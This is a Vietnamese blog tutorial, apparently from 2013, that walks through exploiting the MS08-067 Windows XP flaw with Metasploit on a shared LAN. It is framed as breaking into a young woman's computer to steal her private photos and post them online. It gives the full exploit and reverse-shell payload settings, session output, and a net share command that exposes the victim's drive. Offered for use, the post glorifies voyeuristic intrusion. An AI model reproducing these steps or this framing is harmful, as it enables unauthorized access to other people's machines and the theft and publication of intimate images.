@Câu Chuyện Về Xâm Nhập Máy Tính Từ Xa Qua Lỗi Ms08_067_netapi

Câu chuyện như sau:
Tớ ở trọ trong 1 dãy trọ nọ, chủ nhà có đứa con gái thật xinh, lại nghe đồn có mấy cái clip và hình gì gì đó để trong máy tính, rất may là chủ nhà này có nối mạng cho anh em dãy trọ xài đóng phí, thế là mình và cô ấy cùng mạng Lan rồi. thế nhưng cô ấy không share thì làm ăn được gì, cô ấy dùng máy tính để bàn à, thường thì khoảng 70% máy tính để bàn dùng WinXp rồi, em này chắc gà mờ không update nên chắc nhiều lỗ hổng đây, hôm nay thấy em đang ngồi máy, mình chạy ngay về nhà mở Metasploit lên chuẩn bị quá trình xâm nhập máy em và cướp đống hình kia up lên mạng thôi he he 

Lưu ý: lỗ hổng này chỉ có trên WinXp Sp3 trở về trước thôi

đầu tiên xác định xem có bao nhiêu máy đang nối mạng với mình
mở CMD dùng lệnh

Net View

nào

ví dụ máy em ở đây mình lấy là VPP2 ( hihi thực ra là máy công ty mình )
ta xem ip máy em là gì nào 

ping VPP2

Reply from 192.168.1.4: bytes=32 time<1ms ttl="64<br">Reply from 192.168.1.4: bytes=32 time<1ms ttl="64<br">Reply from 192.168.1.4: bytes=32 time<1ms ttl="64<br">Reply from 192.168.1.4: bytes=32 time<1ms ttl="64</p">

à IP em nó là 192.168.1.4
tốt rồi
mở Metasploit console lên nào
dùng lệnh sau

use exploit/windows/smb/ms08_067_netapi

đây là câu lệnh dùng để exploit lỗi ms08_067_netapi đó
sau đó set payload nào

set PAYLOAD windows/meterpreter/reverse_tcp

tiếp theo set lhost

set lhost 192.168.1.2

<==đây là ip máy mình
sau đó set port mình lắng nghe

set lport 4444

<== nghe ở cổng 4444

set rhost 192.168.1.4

<== Ip của máy em nó 


sau khi set xong ta

show options

xem có gì rồi nào



rồi ok mọi chuyện đã set xong
ta

exploit

nó thôi
chết cha nhầm, quên coi là ip của mình không phải là

192.168.1.2

mà là

192.168.1.3

hihi
set lại nào

set lhost 192.168.1.3

rồi exploit nào

Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:3173) at 2013-03-25 14:16:04 +0700

Máy em nó xài WinXp SP3 và thời gian xâm nhập lúc này là

2013-03-25 14:16:04

ở đây nếu bạn set sai ip có thể set lại, không việc gì cả
sau đó exploit nếu máy trả về

meterpreter >

có nghĩa là xâm nhập thành công, còn nếu không là đã fix
ok, ở đây đã xâm nhập đc máy em nó rồi
vào My Network Places xem máy em nó vpp2 có share gì không? 


chỉ thấy share có 1 cái thôi, không có gì quan trọng cả, mục đích là muốn lấy hình em nó thôi
trong Metasploit sau khi xâm nhập xong ta login vào cmd máy em nó, ở đây ta có thể làm mọi thứ dùng lệnh

shell

để vào cmd

đầu tiên ta share tất cả các ổ đĩa của em nó nào

net share Quachdaigia=e:\

bi giờ vào my network places lại xem nào
đó, bi giờ Quachdaigia là ổ E của em nó vào xem tha hồ thôi


tút đến đây là hết còn ai muốn làm gì thì làm trong cái cmd đó

lần sau mình sẽ hướng dẫn xâm nhập khi em nó mua Laptop và cài win7 nhé!!

Nguồn:http://my.opera.com/vn.null/blog/show.dml/60044492